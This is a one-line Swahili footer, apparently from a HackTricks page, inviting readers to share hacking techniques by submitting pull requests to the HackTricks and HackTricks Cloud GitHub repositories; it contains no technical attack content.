* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>